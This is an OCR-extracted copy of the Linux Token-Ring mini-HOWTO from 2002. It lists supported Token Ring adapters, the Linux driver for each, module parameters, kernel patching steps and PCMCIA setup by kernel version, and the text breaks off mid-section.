"google_gemma-3-12b-it_contains_pii": [[0, 523, false], [523, 2284, null], [2284, 6914, null], [6914, 11254, null], [11254, 15265, null], [15265, 19992, null], [19992, 24721, null], [24721, 28897, null], [28897, 32667, null], [32667, 35696, null], [35696, 38558, null]], "google_gemma-3-12b-it_is_public_document": [[0, 523, true], [523, 2284, null], [2284, 6914, null], [6914, 11254, null], [11254, 15265, null], [15265, 19992, null], [19992, 24721, null], [24721, 28897, null], [28897, 32667, null], [32667, 35696, null], [35696, 38558, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 38558, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 38558, null]], "pdf_page_numbers": [[0, 523, 1], [523, 2284, 2], [2284, 6914, 3], [6914, 11254, 4], [11254, 15265, 5], [15265, 19992, 6], [19992, 24721, 7], [24721, 28897, 8], [28897, 32667, 9], [32667, 35696, 10], [35696, 38558, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 38558, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
d75db49b18504d5f5f28917bed3bd6bdc6541a2d
Token–Ring mini–HOWTO Mike Phillips mikep@linuxtr.net Tom Gall tom_gall@vnet.ibm.com Mike Eckhoff Revision History Revision 5.00 2002–01–23 Revised by: mlp Updated to reflect the current state of Token Ring with Linux Revision 4.3 29 March 2000 Revised by: tg Brought up to date. Revision 4.1 7 January 1998 Revised by: me v4.1 released by Mike This howto is designed to help you get up and running using a Token Ring adaptor to access the network. Generally speaking Section 3 will tell you which driver you need based on the adaptor card you have. # Table of Contents 1. **Introduction** ..................................................................................................................................................... 1 1.1. Special Thanks .................................................................................................................................. 1 1.2. Copyright Information ...................................................................................................................... 1 1.3. Disclaimer ......................................................................................................................................... 2 1.4. New Versions .................................................................................................................................... 2 1.5. Credits ............................................................................................................................................... 2 1.6. Feedback ........................................................................................................................................... 2 2. **Hardware requirements** ........................................................................................................................................ 4 3. **Which driver should I use?** ........................................................................................................................... 6 3.1. Drivers/Adapter Specifics ................................................................................................................. 7 3.1.1. Kernel Module Aliases and Parameters ............................................................................ 8 3.1.2. IBMTR Driver .................................................................................................................. 8 3.1.3. Olympic Driver ................................................................................................................. 9 3.1.4. Lanstreamer Driver ......................................................................................................... 10 3.1.5. 3Com 3C359 Driver ........................................................................................................11 3.1.6. SysKonnect adapters ....................................................................................................... 13 3.1.7. PCMCIA ................................................................................................................................. 15 3.1.8. Madge Supplied Drivers ................................................................................................. 18 3.1.9. Olicom Drivers ............................................................................................................... 19 4. **Known problems** ........................................................................................................................................... 20 5. **VMWare and Token Ring** ........................................................................................................................................ 21 6. **Commonly asked Questions** .............................................................................................................................. 22 A. **GNU Free Documentation License** .............................................................................................................. 23 A.1. 0. PREAMBLE .......................................................................................................................................... 24 A.2. 1. APPLICABILITY AND DEFINITIONS .................................................................................. 25 A.3. 2. VERBATIM COPYING ....................................................................................................................... 26 A.4. 3. COPYING IN QUANTITY .............................................................................................................. 27 A.5. 4. MODIFICATIONS ................................................................................................................................... 28 A.6. 5. COMBINING DOCUMENTS .......................................................................................................... 30 A.7. 6. COLLECTIONS OF DOCUMENTS ........................................................................................... 31 A.8. 7. AGGREGATION WITH INDEPENDENT WORKS ........................................................................... 32 A.9. 8. TRANSLATION ................................................................................................................................... 33 # Table of Contents [A.10. 9. TERMINATION](#) .................................................................................................................................34 [A.11. 10. FUTURE REVISIONS OF THIS LICENSE](#) ..................................................................................35 1. Introduction Welcome to the Linux Token Ring mini–howto. We hope you find the information contained within helpful. If you have any problems with the drivers that are not talked about in this howto, feel free to email me at <mikep@linuxtr.net>. You may also wish to join the Linux on Token Ring Listserv by mailing <majordomo@linuxtr.net> with the body containing: ``` subscribe linux-tr ``` The latest and greatest information, drivers, patches, bug fixes, etc, etc can always be found at the Linux Token Project site. 1.1. Special Thanks Thanks to Mark Swanson, Peter De Schrijver, David Morris, Paul Norton and everyone else who has contributed to the Token Ring code and drivers over the years. Thanks also to the many people and companies who have provided hardware and technical documents to enable the drivers to be written in the first place. Special Thanks to Mike Eckhoff the originator of this HOWTO, and Tom Gall for the previous version, and to Matthew Marsh for hosting the website and mailing list! And, finally, thanks to all to subscribers to the linux–tr mailing list who have provided support, feedback, testing and thanks over the years. It wouldn't have been worth it without your continued support and gratitude. 1.2. Copyright Information This document is copyright (c) 1995–1998 by Michael Eckhoff, copyright(c) 2000 by Tom Gall and copyright (c) 2001 by Mike Phillips. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.1 or any later version published by the Free Software Foundation, with no Invariant sections, with no Front−Cover Texts, and with no Back−Cover Texts. A copy of the license is included in Appendix A If you have any question, please contact <linux−howto@linuxdoc.org> 1.3. Disclaimer No liability for the contents of this document can be accepted. Use the concepts, examples and other content at your own risk. As this is a new edition of this document, there may be errors and inaccuracies, that may of course be damaging to your system. Proceed with caution, and although this is highly unlikely, the authors do not take any responsibility for that. All copyrights are held by their respective owners, unless specifically noted otherwise. Use of a term in this document should not be regarded as affecting the validity of any trademark or service mark. Naming of particular products or brands should not be seen as endorsements. You are strongly recommended to take a backup of your system before major installation and backups at regular intervals. 1.4. New Versions The latest version of this document can always be found at Linux Token Ring Project under the Documentation section. The latest version of this HOWTO will always be made available on the Linux Token Ring Project website, in a variety of formats: - HTML, - Plain text, - Adobe Acrobat pdf, - Postscript, - SGML source. 1.5. Credits In this version I have the pleasure of acknowledging: IBM for providing hardware, technical documentation and technical support when the tech docs didn't quite seem enough. Madge for providing their hardware to test with. 3Com for proving the technical documents to allow the 3c359 driver to be developed. 1.6. Feedback Feedback is most certainly welcome for this document. Without your submissions and input, this document wouldn't exist. Please send your additions, comments and criticisms to the following email address: <mikep@linuxtr.net> 2. **Hardware requirements** Make sure that you have a Token Ring card that is supported from the list below. Many PCI, ISA and even the odd MCA cards are now supported. Check [http://www.linuxtr.net](http://www.linuxtr.net) for the latest information. Cards that are reported to work: **3COM** - 3C389 PCMCIA - 3C619, 3C619B or 3C619C Token Link - 3C319 Velocity ISA - 3C359 Velocity XL – PCI - 3C339 Velocity PCI **IBM** - **PCI.** PCI Token Ring Adapter; PCI Wake on Lan Token Ring Adapter; 16/4 Token Ring PCI Adapter 2, Wake on Lan, and Wake on Lan Special; High Speed 100/16/4 Token Ring Adapter, Token Ring 16/4 Management Adapter. - **Cardbus.** 16/4 Token Ring Adapter - **LanStreamer.** PCI: Auto LanStreamer, Triple Lanstreamer; MCA: LanStreamer MC16, Lanstreamer MC32, AutoLanstreamer MC32, Dual Lanstreamer MC32 - **ISA.** Auto 16/4 Token Ring Adapter, 16/4 Token Ring Adapter, Turbo 16/4 Token Ring Adapter, Auto Wake Token Ring Adapter. - **PCMCIA.** Turbo 16/4 PC Card, Turbo 16/4 PC Card 2, Auto 16/4 Credit Card Adapter, 16/4 Credit Card Adapter, 16/4 Credit Card Adapter II - **Tropic MCA.** 16/4 Token Ring Adapter/A, Auto 16/4 Token Ring Adapter **Olicom** - RapidFire 3139, 3140, 3141, and 3540 - OC 3136 - OC 3137 - OC 3118 - OC 3129 **Madge** - 51–02 Smart 16/4 PCI - 20–03 16/4 Cardbus Adapter Mk2 - 51–04 Smart 16/4 PCI Ringnode Mk3 - 51–09 Smart 16/4 Fiber PCI Ringnode - 51–07 Smart 100/16/4 PCI–HS Ringnode - 51–05 Smart 100/16/4 PCI Ringnode - 20–01 Smart 16/4 PCMCIA - 60–07 Presto PCI 2000 - 60–06 Presto PCI Plus - 60–05 Presto PCI - 53–05 Smart Mk4 PCI Adapter (low profile) • 31-40 Rapidfire 3140V2 16/4 PCI Adapter SysKonnect • TR4/16(+) SK–4190 ISA • TR4/16(+) SK–4590 PCI • TR4/16(+) SK–4591 PCI SMC • Tokencard Elite (8115T) • Tokencard Elite/A MCA (8115T/A) Intel • TokenExpress PRO • TokenExpress 16/4 Cards that may cause problems: **Token–Ring Network 16/4 Adapter II.** This adapter will NOT work. Do not confuse this card with the IBM Token Ring adapter II (4mbit) which does. It is a DMA/Busmaster adapter for ISA. **3Com TokenLink Velocity ISA.** You may or may not get this one to work. I have had reports of people running it without problems, and others who get errors left and right. 3. Which driver should I use? The realm of Token Ring drivers on Linux has expanded quite a bit in the last couple of years. It’s not just `ibmtr` anymore! So as a result this map will tell you given a card which driver you should try and the recommended minimum kernel version (if any). 3COM - 3C389 PCMCIA — `ibmtr_cs` - 3C619, 3C619B or 3C619C Token Link — `ibmtr` - 3C319 Velocity ISA — try `ibmtr` - 3C359 Velocity XL – PCI — driver available from [http://www.linuxtr.net](http://www.linuxtr.net) - 3C339 Velocity PCI — `tms380tr` IBM - PCI Token Ring Adaptor — `olympic` - PCI Wake on Lan Token Ring Adaptor — `olympic` - 16/4 Token Ring PCI Adaptor 2, Wake On Lan, and Wake on Lan Special — `olympic` - High Speed 100/16/4 Token Ring — `olympic` - Turbo 16/4 ISA adapter — `ibmtr` - Token Ring Auto 16/4 ISA adapter — `ibmtr` - Token Ring Auto 16/4 adapter /A — `ibmtr` - Token Ring 16/4 adapter /A — `ibmtr` - Token Ring adapter /A — `ibmtr` - Token Ring adapter II (4 Megabit only) — `ibmtr` - 16/4 ISA Token Ring card (16bit) — `ibmtr` - 16/4 ISA Token Ring card (8bit) — `ibmtr` - All LANStreamers — `lanstreamer` - PCMCIA – Turbo 16/4 — `ibmtr_cs` - PCMCIA – 16/4 — `ibmtr_cs` - Cardbus – 16/4 – `olympic`, kernel v.2.4.3 or greater Olicom - RapidFire 3139, 3140, 3141, and 3540 - OC 3136 - OC 3137 - OC 3118 - OC 3129 For these Olicom cards, see their website [http://www.olicom.com](http://www.olicom.com) for drivers. You will need a 2.2.x series kernel. Madge - 51–02 Smart 16/4 PCI - 20–03 16/4 Cardbus Adapter Mk2 - 51–04 Smart 16/4 PCI Ringnode Mk3 - 51–09 Smart 16/4 Fiber PCI Ringnode - 51–07 Smart 100/16/4 PCI–HS Ringnode • 51−05 Smart 100/16/4 PCI Ringnode • 20−01 Smart 16/4 PCMCIA • 60−07 Presto PCI 2000 • 60−06 Presto PCI Plus • 60−05 Presto PCI For these Madge cards you'll want to visit their site http://www.madge.com for drivers and get the 2.31 Madge drivers. You will need either a 2.0.36 or 2.2.5 as a minimum. 2.41 drivers: • 51−05 Smart Mk4 PCI Adapter • 53−05 Smart Mk4 PCI Adapter (low profile) • 31−40 Rapidfire 3140V2 16/4 PCI Adapter • 20−03 Smart 16/4 Cardbus Mk2 • 51−04 Smart 16/4 PCI Ringnode Mk3 • 60−07 Presto PCI 2000 • 60−06 Presto PCI Plus • 60−05 Presto PCI According to the Madge README file the 2.41 driver has been tested on uniprocessor and SMP kernel versions: 2.0.36, 2.2.5−15, 2.2.10, 2.2.12−20, 2.4.2−2. Other Madge cards are reportedly based on the Texas Instruments tms380 chipset and thus as of the 2.3.26 kernel you can try the tms380tr driver. SysKonnect • TR4/16(+) SK−4190 ISA • TR4/16(+) SK−4590 PCI • TR4/16(+) SK−4591 PCI In the 2.2.x series of kernels try sktr. In the 2.3.x and greater series try the tms380tr driver. SMC • Tokencard Elite (8115T) • Tokencard Elite/A MCA (8115T/A) Driver is included as part of the 2.3.38+ kernel. Intel • TokenExpress PRO • TokenExpress 16/4 Support for these cards is currently under development. Check http://www.linuxtr.net for status. 3.1. Drivers/Adapter Specifics Here we'll describe the different options and configurations available for each of the available drivers. 3.1.1. Kernel Module Aliases and Parameters Most drivers accept arguments in the form of module parameters (with the exception of the special case of PCMCIA, which is fully described below). Kernel modules are specified in the file /etc/conf.modules or /etc/modules.conf depending upon which version of modutils you've got. You can directly modify this file or use the tools builtin to your specific distribution. These distribution specific tools are beyond the scope of this document, but you can always directly modify the modules.conf file by hand to get things up and running and then figure out how your distribution handles these files. For example, Debian has several files in the /etc/modutils directory and from these builds the modules.conf file. Kernel modules aliases are utilized to associate a particular name with a kernel module. For token ring, this is used to assign drivers for each of the token ring interfaces so that the system scripts know which driver to insert when you bring an interface up. The format of the alias lines are: ``` alias module_name interface ``` Usually, the only line you'll need for the token ring networking would be something like: ``` alias olympic tr0 ``` This binds the olympic driver to the tr0 interface so when you type: ``` ifconfig tr0 up ``` if the tr0 interface is not already loaded, the system will insert the olympic driver, which in turn will find the network card and create the tr0 network device. Kernel modules parameters are specified in the following format: ``` options module_name parameter_1=XXX [parameter2=YYY ...] ``` Where the modules_name is the name of the driver, i.e. olympic, ibmtr, 3c359 and the parameters are those available for each driver. See either the following sections for driver specifics or check out the drivers source code. For example, if you wanted to set the Olympic driver to 16 mbps operation and with a default buffer size of 8192 bytes, you would use the following line: ``` options olympic ringspeed=16 pkt_buf_sz=8192 ``` 3.1.2. IBMTR Driver IBM Tropic Chipset Based Token Ring Adapters This is the original token ring driver in the kernel and supports almost all adapters that use the IBM Tropic chipset, including the IBM ISA, ISA/Pnp, and a multitude of adapters from other manufacturers. The IBM Turbo 16/4 ISA/PnP adapter will, in fact, work fine with the ibmtr driver. In older drivers you had to run the card in Auto 16/4 compatibility mode. The simplest way to set this is to use the LANAID disks sent with the card and run the command: ``` LANAIDC /FAST=AUTO16 ``` You should then use LANAIDC or LANAID to configure the card according to documentation. The latest drivers for the Turbo Adapters will recognize these adapters and configure them straight out of the box. You may have to either turn off isapnp support in the kernel or modify your isapnp.conf file to enable the adapter. Options: Perusal of the ibmtr source code may leave you to believe that the adapter can take three parameters, however, in reality the driver doesn't take any. These parameters are a hang over from the early stages of the driver and are only intended to be used to force the driver to only test restricted addresses when looking for adapters. The information on these options are included here for completeness only. - **io**: Specify the I/O ports that the driver will check for the presence of any cards. All Tropic based ISA adapters, or adapters emulating the ISA cards will be found on either port 0xA20 or 0xA24. If you know that your adapter is configured for 0xA24 and/or that probing on port 0xA20 will cause problems with your machine, use io to force the driver to check a specific port only. The Turbo adapters (including the confusingly named latest Auto 16/4 cards) can have their io regions located anywhere permitted by the PnP specification. This location is found using the new turbo detection code and no parameters are required. - **irq & mem**: The two options were used to tell the driver exactly which irq to use and where the shared ram for the adapter could be found. These two options are now totally redundant in the driver as the interrupt line and the location of the shared ram is obtained directly by interrogating the adapter. ### 3.1.3. Olympic Driver IBM PCI Pit/Pit−Phy/Olympic chipset based token ring cards Options: The driver accepts four options: ringspeed, pkt_buf_sz, message_level and network_monitor. These options can be specified differently for each card found, i.e if you have two olympic adapters in your machine and want to assign a ring speed of 16mbps to the first adapter, but a ring speed of 4mbps to the second adapter, your options line would read: ``` options olympic ringspeed=16,4 ``` However, it should be noted that the driver assigns value to each adapter in the order they are discovered, which is usually the order there are present on the pci bus. A little trial and error may be required to be certain which adapter is receiving which configuration option. - **ringspeed**: Has one of three settings 0 (default), 4 or 16. 0 will make the card autosense the ringspeed and join at the appropriate speed, this will be the default option for most people. 4 or 16 allow you to explicitly force the card to operate at a certain speed. The card will fail if you try to insert it at the wrong speed. (Although some hubs will allow this so be *very* careful). The main purpose for explicitly setting the ring speed is for when the card is first on the ring. In autosense mode, if the card cannot detect any active monitors on the ring it will not open, so you must re-init the card at the appropriate speed. Unfortunately at present the only way of doing this is rmmod and insmod which is a bit tough if it is compiled in the kernel. The driver does support 100 mbps full duplex operation. This is automatically detected by the adapter when connected to an appropriate switch. **pkt_buf_sz:** This is this initial receive buffer allocation size. This will default to 4096 if no value is entered. You may increase performance of the driver by setting this to a value larger than the network packet size, although the driver now re-sizes buffers based on MTU settings as well. **message_level:** Controls level of messages created by the driver. Defaults to 0 which only displays start-up and critical messages. Presently any non-zero value will display all soft messages as well. NB This does not turn debugging messages on, that must be done by modified the source code. **network_monitor:** Any non-zero value will provide a quasi network monitoring mode. All unexpected MAC frames (beaconing etc.) will be received by the driver and the source and destination addresses printed. Also an entry will be added in /proc/net called olympic_tr%d, where tr%d is the registered device name, i.e tr0, tr1, etc. This displays low level information about the configuration of the ring and the adapter. This feature has been designed for network administrators to assist in the diagnosis of network / ring problems. (This used to OLYMPIC_NETWORK_MONITOR, but has now changed to allow each adapter to be configured differently and to alleviate the necessity to re-compile olympic to turn the option on). ### Multi-card The driver will detect multiple cards and will work with shared interrupts, each card is assigned the next token ring device, i.e. tr0, tr1, tr2. The driver should also happily reside in the system with other drivers. It has been tested with ibmtr.c running. I have had multiple cards in the same system, all sharing the same interrupt and working perfectly fine together. This is also true for the Cardbus Olympic adapters, I have quite happily had a Cardbus adapter and regular 16 bit PCMCIA token ring adapter working together in the same laptop. ### Variable MTU size The driver can handle a MTU size upto either 4500 or 18000 depending upon ring speed. The driver also changes the size of the receive buffers as part of the mtu re-sizing, so if you set mtu = 18000, you will need to be able to allocate 16 * (sk_buff with 18000 buffer size) call it 18500 bytes per ring position = 296,000 bytes of memory space, plus of course anything necessary for the tx sk_buff’s. Remember this is per card, so if you are building routers, gateway’s etc, you could start to use a lot of memory real fast. ### 3.1.4. Lanstreamer Driver IBM PCI/MCA Lanstreamer chipset based token ring cards #### Options: The driver accepts three options: ringspeed, pkt_buf_sz, message_level and network_monitor. These options can be specified differently for each card found, i.e if you have two olympic adapters in your machine and want to assign a ring speed of 16mbps to the first adapter, but a ring speed of 4mbps to the second adapter, your options line would read: ``` options lanstreamer ringspeed=16,4 ``` However, it should be noted that the driver assigns value to each adapter in the order they are discovered, which is usually the order there are present on the pci/mca bus. A little trial and error may be required to be certain which adapter is receiving which configuration option. - **ringspeed**: Has one of three settings 0 (default), 4 or 16. 0 will make the card autosense the ringspeed and join at the appropriate speed, this will be the default option for most people. 4 or 16 allow you to explicitly force the card to operate at a certain speed. The card will fail if you try to insert it at the wrong speed. (Although some hubs will allow this so be *very* careful). The main purpose for explicitly setting the ring speed is for when the card is first on the ring. In autosense mode, if the card cannot detect any active monitors on the ring it will not open, so you must re-init the card at the appropriate speed. Unfortunately at present the only way of doing this is rmmod and insmod which is a bit tough if it is compiled in the kernel. switch. - **pkt_buf_sz**: This is the initial receive buffer allocation size. This will default to 4096 if no value is entered. You may increase performance of the driver by setting this to a value larger than the network packet size, although the driver now re-sizes buffers based on MTU settings as well. - **message_level**: Controls level of messages created by the driver. Defaults to 0 which only displays start-up and critical messages. Presently any non-zero value will display all soft messages as well. NB This does not turn debugging messages on, that must be done by modified the source code. **Network Monitor.** The Lanstreamer driver does support a network monitor mode similar to the olympic driver, however it is a compile time option and not a module parameter. To enable the network monitor mode, edit lanstreamer.c and change the line: ```c #define STREAMER_NETWORK_MONITOR 0 ``` to read: ```c #define STREAMER_NETWORK_MONITOR 1 ``` All unexpected MAC frames (beaconing etc.) will be received by the driver and the source and destination addresses printed. Also an entry will be added in /proc/net called streamer_tr. This displays low level information about the configuration of the ring and the adapter. This feature has been designed for network administrators to assist in the diagnosis of network / ring problems. **Multi-card.** The driver will detect multiple cards and will work with shared interrupts, each card is assigned the next token ring device, i.e. tr0, tr1, tr2. The driver should also happily reside in the system with other drivers. **Variable MTU size.** The driver can handle a MTU size upto either 4500 or 18000 depending upon the speed. The driver also changes the size of the receive buffers as part of the mtu re-sizing, so if you set mtu = 18000, you will need to be able to allocate 16 * (sk_buff with 18000 buffer size) call it 18500 bytes per ring position = 296,000 bytes of memory space, plus of course anything necessary for the tx sk_buff's. Remember this is per card, so if you are building routers, gateway's etc, you could start to use a lot of memory real fast. ### 3.1.5. 3Com 3C359 Driver **3COM PCI TOKEN LINK VELOCITY XL TOKEN RING CARDS** Currently the 3c359 driver is not included in the standard kernel source. To utilize the driver, you must download the driver from the [Linux Token Ring Project] web site and patch your kernel. Once you've downloaded the file, you can patch your kernel with the following commands: ```bash cd /usr/src/linux patch -p1 < 3c359-2.4.16.patch ``` or, if the patch file is gzipped: ```bash zcat 3c359-2.4.16.patch | patch -p1 ``` Then just run `make config|menuconfig|xconfig` and select the 3c359 driver from the token ring drivers section of the kernel configuration and then compile and install the kernel and/or modules as usual. Options: The driver accepts three options: `ringspeed`, `pkt_buf_sz`, `message_level`. These options can be specified differently for each card found, i.e. if you have two olympic adapters in your machine and want to assign a ring speed of 16mbps to the first adapter, but a ring speed of 4mbps to the second adapter, your options line would read: ```bash options 3c359 ringspeed=16,4 ``` However, it should be noted that the driver assigns value to each adapter in the order they are discovered, which is usually the order there are present on the pci bus. A little trial and error may be required to be certain which adapter is receiving which configuration option. - **ringspeed**: Has one of three settings 0 (default), 4 or 16. 0 will make the card autosense the ringspeed and join at the appropriate speed, this will be the default option for most people. 4 or 16 allow you to explicitly force the card to operate at a certain speed. The card will fail if you try to insert it at the wrong speed. (Although some hubs will allow this so be *very* careful). The main purpose for explicitly setting the ring speed is for when the card is first on the ring. In autosense mode, if the card cannot detect any active monitors on the ring it will open at the same speed as its last opening. This can be hazardous if this speed does not match the speed you want the ring to operate at. - **pkt_buf_sz**: This is the initial receive buffer allocation size. This will default to 4096 if no value is entered. You may increase performance of the driver by setting this to a value larger than the network packet size, although the driver now re-sizes buffers based on MTU settings as well. - **message_level**: Controls level of messages created by the driver. Defaults to 0 which only displays start-up and critical messages. Presently any non-zero value will display all soft messages as well. NB This does not turn debugging messages on, that must be done by modified the source code. **Multi-card.** The driver will detect multiple cards and will work with shared interrupts, each card is assigned the next token ring device, i.e. tr0, tr1, tr2. The driver should also happily reside in the system with other drivers. It has been tested with ibmtr.c running. I have had multiple cards in the same system, all sharing the same interrupt and working perfectly fine together. **Variable MTU size**: The driver can handle a MTU size up to either 4500 or 18000 depending upon ring speed. The driver also changes the size of the receive buffers as part of the mtu re-sizing, so if you set mtu = 18000, you will need to be able to allocate 16 * (sk_buff with 18000 buffer size) call it 18500 bytes per ring position = 296,000 bytes of memory space, plus of course anything necessary for the tx sk_buff's. Remember this is per card, so if you are building routers, gateway's etc, you could start to use a lot of memory real fast. 3.1.6. SysKonnect adapters Information for the SysKonnect Token Ring ISA/PCI Adapter is courtesy Jay Schulist <jschlst@samba.org> The Linux SysKonnect Token Ring driver works with the SysKonnect TR4/16(+) ISA, SysKonnect TR4/16(+) PCI, SysKonnect TR4/16 PCI, and older revisions of the SK NET TR4/16 ISA card. Latest information on this driver can be obtained on the Linux–SNA WWW site. Please point your browser to: http://www.linux–sna.org Important information to be noted: - 1. Adapters can be slow to open (~20 secs) and close (~5 secs), please be patient. - 2. This driver works very well when autoprobing for adapters. Why even think about those nasty io/int/dma settings of modprobe when the driver will do it all for you! This driver is rather simple to use. Select Y to Token Ring adapter support in the kernel configuration. A choice for SysKonnect Token Ring adapters will appear. This drives supports all SysKonnect ISA and PCI adapters. Choose this option. I personally recommend compiling the driver as a module (M), but if you would like to compile it statically answer Y instead. This driver supports multiple adapters without the need to load multiple copies of the driver. You should be able to load up to 7 adapters without any kernel modifications, if you are in need of more please contact the maintainer of this driver. Load the driver either by lilo/loadlin or as a module. When a module using the following command will suffice for most: ``` # modprobe sktr ``` This will produce output similar to the following: (Output is user specific) ``` sktr.c: v1.01 08/29/97 by Christoph Goos tr0: SK NET TR 4/16 PCI found at 0x6100, using IRQ 17. tr1: SK NET TR 4/16 PCI found at 0x6200, using IRQ 16. tr2: SK NET TR 4/16 ISA found at 0xa20, using IRQ 10 and DMA 5. ``` Now just setup the device via ifconfig and set and routes you may have. After this you are ready to start sending some tokens. Errata. For anyone wondering where to pick up the SysKonnect adapters please browse to http://www.syskonnect.com Below is the setting for the SK NET TR 4/16 ISA adapters ``` ****************************************************************************** *** CONTENTS *** ****************************************************************************** 1) Location of DIP-Switch W1 2) Default settings 3) DIP-Switch W1 description ``` CHAPTER 1 LOCATION OF DIP−SWITCH CHAPTER 2 DEFAULT SETTINGS W1 1 2 3 4 5 6 7 8 | ON X | | OFF X X X X X X X | W1.1 = ON Adapter drives address lines SA17..19 W1.2 − 1.5 = OFF BootROM disabled W1.6 − 1.8 = OFF I/O address 0A20h CHAPTER 3 DIP SWITCH W1 DESCRIPTION <table> <thead> <tr> <th>AD</th> <th>BootROM Addr.</th> <th>I/O</th> </tr> </thead> <tbody> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> </tr> <tr> <td></td> <td></td> <td></td> </tr> </tbody> </table> <table> <thead> <tr> <th>6 7 8</th> </tr> </thead> <tbody> <tr> <td>ON ON ON 1900h</td> </tr> <tr> <td>ON ON OFF 0900h</td> </tr> <tr> <td>ON OFF ON 1980h</td> </tr> <tr> <td>ON OFF OFF 0980h</td> </tr> <tr> <td>OFF ON ON 1b20h</td> </tr> <tr> <td>OFF ON OFF 0b20h</td> </tr> <tr> <td>OFF OFF ON 1a20h</td> </tr> <tr> <td>OFF OFF OFF 0a20h (+)</td> </tr> </tbody> </table> 3.1.6. SysKonnect adapters ### 3.1.7. PCMCIA #### 3.1.7.1. Introduction PCMCIA Token Ring adapters will work on all versions of the Linux kernel. Unfortunately, the road to hell is often paved with melting snowballs ;−) and there are a myriad of different combinations that can be used to get the adapters to work, all with different options, different requirements and different issues. Hopefully with this document you will be able to figure out which combinations of ingredients are required and how to get them up and running on your machine. #### 3.1.7.2. History In the 2.0.x and 2.2.x kernels days, pcmcia was only available as an external package, created and maintained by David Hinds. When the only stable kernel available was 2.0.36, life was pretty easy and with a few simple configuration options the adapters would work. With the advent of 2.2.x, ibmtr.c was completely updated, which broke the pcmcia driver (ibmtr_cs.c). The pcmcia driver was updated to work with the new ibmtr driver and the 2.2.x kernels. This is where the first level of complication starts. As the pcmcia_cs package is stand alone, it has to support the various different kernels, so instead of being able to have different versions of drivers in different versions of the kernel source, the pcmcia_cs drivers must work with all kernel versions. This not only creates some ugliness in the driver itself but also causes confusion as to which version of pcmcia_cs works for the latest kernel. At this point, everything was working fine, and then come along the 2.3.x development series of kernels. The 2.3.x kernels provided their own support for pcmcia and the ibmtr_cs driver was included in the kernel proper. So now there were two ways of getting pcmcia token ring support, either using the kernel drivers themselves or using the pcmcia_cs package, not too much of a problem because only developers were using the 2.3.x kernels. Of course this all changed when the 2.4 kernel was released and a lot more users started using the kernel. During late 2000, early 2001, significant development work was done on both the standard ibmtr driver and... the pcmcia driver. Original pcmcia updates including using high memory and hot−eject support. These initial updates were only for the 2.2.x kernels, and hence only included in the pcmcia_cs package. Later development saw great improvements in ibmtr and ibmtr_cs for the 2.4.x kernels. So as of writing, 1/23/02, there are many different combinations of kernel version and driver floating around especially considering that different distributions have released different versions of the 2.4 kernels. 3.1.7.3. 2.0.x kernels If you are using one of the 2.0.x kernels, then I salute your perserverance and really you should have got the pcmcia drivers configured and working by now :-) You will have to use the pcmcia_cs package and play with the /etc/pcmcia/config.opts, see the section below about config.opts fun. Just about any version of pcmcia_cs that's been released in the last 2/3 years will work fine. 3.1.7.4. 2.2.0 − 2.2.6 kernels These were the series of kernels where the pcmcia driver didn't work at all. It's probably just easiest to upgrade the kernel to a later version. If you really do need to get this up and running, then a recent pcmcia_cs is required and you should be able to grab the ibmtr.c and ibmtr.h from a 2.2.7 − 2.2.16 kernel and use them (note no greater than 2.2.16 !!) You have to do the config.opts mangling, see the section on setting all this up. 3.1.7.5. 2.2.7 − 2.2.16 kernels These kernels are well supported, simply use the pcmcia_cs package and play with the config.opts file. 3.1.7.6. 2.2.17 − 2.2.19 kernels The pcmcia driver was updated for these kernel to eliminate the need for the config.opts mangling. You'll need pcmcia_cs at least 3.1.24, although it is probably better just to grab the latest version. Simply compile up pcmcia_cs and you're done. No need to play with config.opts, in fact if you've been running a previous version that did have the ibmtr_cs line in config.opts it would be a very good idea to remove or comment out the line. The new driver allocates the entire 64k for shared ram and it needs to be aligned on a 64k boundary, if you've got a previous srambase value not on a 64k boundary, the driver will barf and the kernel will panic. 3.1.7.7. 2.4.0 − 2.4.4 (non Redhat) kernels Use the built−in kernel pcmcia driver and play with config.opts. 3.1.7. PCMCIA If you want to use the latest and greatest version of the driver with the high memory and hot-swap support you can download the patch and patch up your kernel. Then the line in `config.opts` can be removed and everything will work fine. ### 3.1.7.8. 2.4.4-ac11 > kernels These kernels include the new drivers so simply compile up the drivers, ensure that there is no configuration line in `config.opts` and away you go. ### 3.1.7.9. 2.4.2 mangled, i.e. Redhat 7.1 When RedHat released 7.1 with the 2.4.2 kernel they modified the kernel (as they always do) and included the updated ibmtr/ibmtr_cs driver from the [website](#). If you're lucky this may work straight out of the box (again no need for the `ibmtr_cs` line in `config.opts`), if not then it is probably easiest to upgrade to the latest 2.4.x kernels and use the drivers there. (The reason being that while I will work out how to get around a distribution caused problem, I will not provide support for them, I'll answer questions and give help because I'm a nice guy, but I am not going to provide driver updates against distributions. Official support is for the drivers in the kernels available from the official kernel mirrors. ### 3.1.7.10. 2.4.x kernels and pcmaiia_cs There is no need to use `pcmaiia_cs` with the 2.4 kernels to get the token ring adapters up and running, but I appreciate that some of you may need to use `pcmaiia_cs` to get other adapters working that are not supported properly in the kernel. The `pcmaiia_cs` package will not work with the latest drivers, it may work with the 2.4.0–2.4.4 drivers. I am currently in two minds about providing support with `pcmaiia_cs` for the 2.4 kernels, you can ask me directly or check the [website](#) every now and then so see if anything has changed. ### 3.1.7.11. 